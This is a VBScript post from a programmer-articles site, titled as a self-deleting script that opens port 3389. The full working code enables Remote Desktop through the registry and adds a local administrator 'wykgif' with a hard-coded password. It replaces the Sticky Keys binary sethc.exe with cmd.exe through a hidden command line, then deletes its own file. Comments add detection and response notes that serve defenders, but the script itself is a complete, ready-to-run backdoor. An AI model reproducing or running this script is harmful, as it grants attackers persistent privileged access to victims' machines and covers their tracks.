
可自删除 开启3389创建用户粘滞键后门的vbs

程序员文章站 2022-08-27 14:54:15
' Section 1 of 3: enables Remote Desktop by writing registry values through the
' WMI StdRegProv provider.
' Detection: registry value-set telemetry on the Terminal Server key (e.g. Sysmon
' Event ID 13, or Security Event ID 4657 where auditing is configured on the key)
' showing fDenyTSConnections changed to 0 by wscript.exe/cscript.exe or the WMI
' provider host.
' Mitigation: enforce the RDP setting by policy, require Network Level
' Authentication, and do not expose TCP 3389 to untrusted networks.
'
' "on error resume next" suppresses all runtime errors, so a failure (for example
' missing privileges) produces no message.
on error resume next
' Numeric identifier StdRegProv uses for the HKEY_LOCAL_MACHINE hive.
const hkey_local_machine = &h80000002
' "." selects the local computer.
strcomputer = "."
' Assigned but not used anywhere in this listing.
set stdout = wscript.stdout
' Bind to the registry provider in the root\default WMI namespace.
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &_
strcomputer & "\root\default:stdregprov")
' Make sure the keys written below exist.
strkeypath = "system\currentcontrolset\control\terminal server"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\currentcontrolset\control\terminal server\winstations\rdp-tcp"
strkeypath = "system\currentcontrolset\control\terminal server"
' fDenyTSConnections = 0 allows incoming Remote Desktop connections.
strvaluename = "fdenytsconnections"
dwvalue = 0
oreg.setdwordvalue hkey_local_machine,strkeypath,strvaluename,dwvalue
' Set the RDP listener port to 3389 in both places it is stored.
strkeypath = "system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp"
strvaluename = "portnumber"
dwvalue = 3389
oreg.setdwordvalue hkey_local_machine,strkeypath,strvaluename,dwvalue
strkeypath = "system\currentcontrolset\control\terminal server\winstations\rdp-tcp"
strvaluename = "portnumber"
dwvalue = 3389
oreg.setdwordvalue hkey_local_machine,strkeypath,strvaluename,dwvalue
' Section 2 of 3: creates a local user account and adds it to the local
' Administrators group through the ADSI WinNT provider.
' The account name and password come from the first two script arguments; with no
' arguments the hard-coded pair below is used.
' Indicator: a local account named "wykgif" that the owner of the host did not create.
' Detection: Security Event ID 4720 (user account created) followed closely by
' Event ID 4732 (member added to a security-enabled local group) for Administrators,
' originating from a script-host process.
' Response: disable and remove the account, then review what it logged on to.
on error resume next
dim username,password:if wscript.arguments.count then:username=wscript.arguments(0):password=wscript.arguments(1):else:username="wykgif":password="wykgif123456":end if:set wsnetwork=createobject("wscript.network"):os="winnt://"&wsnetwork.computername:set ob=getobject(os):set oe=getobject(os&"/administrators,group"):set od=ob.create("user",username):od.setpassword password:od.setinfo:set of=getobject(os&"/"&username&",user"):oe.add(of.adspath)'wscript.echo of.adspath
' Section 3 of 3: replaces the Sticky Keys accessibility binary (sethc.exe) with a
' copy of cmd.exe, then deletes this script file.
' This is the accessibility-features persistence technique (MITRE ATT&CK T1546.008).
' What the single command line below does, in order:
'   - takes ownership of system32\sethc.exe and grants the current user full control
'   - copies cmd.exe to acmd.exe and the original sethc.exe to asethc.exe
'   - deletes sethc.exe and renames acmd.exe to sethc.exe
' Indicators: system32\asethc.exe present; sethc.exe whose hash or version info
' matches cmd.exe; changed owner/ACL on sethc.exe.
' Detection: process-creation logs showing takeown/cacls against sethc.exe, file
' integrity monitoring on system32 accessibility binaries, and cmd.exe-like
' processes started under winlogon.exe at the logon screen.
' Response: restore sethc.exe from a known-good source (e.g. sfc /scannow) and
' remove asethc.exe; Network Level Authentication limits pre-logon reachability of
' the logon screen over RDP.
on error resume next
dim obj, success
set obj = createobject("wscript.shell")
' Window style 0 keeps the console hidden; true makes the script wait for completion.
success = obj.run("cmd /c takeown /f %systemroot%\system32\sethc.exe&echo y| cacls %systemroot%\system32\sethc.exe /g %username%:f&copy %systemroot%\system32\cmd.exe %systemroot%\system32\acmd.exe&copy %systemroot%\system32\sethc.exe %systemroot%\system32\asethc.exe&del %systemroot%\system32\sethc.exe&ren %systemroot%\system32\acmd.exe sethc.exe", 0, true)
' Attempts to remove the script file by its own name, so the .vbs may be absent
' during triage; rely on wscript.exe/cscript.exe process-creation records and the
' registry, account and file changes above rather than on finding the file.
createobject("scripting.filesystemobject").deletefile(wscript.scriptname)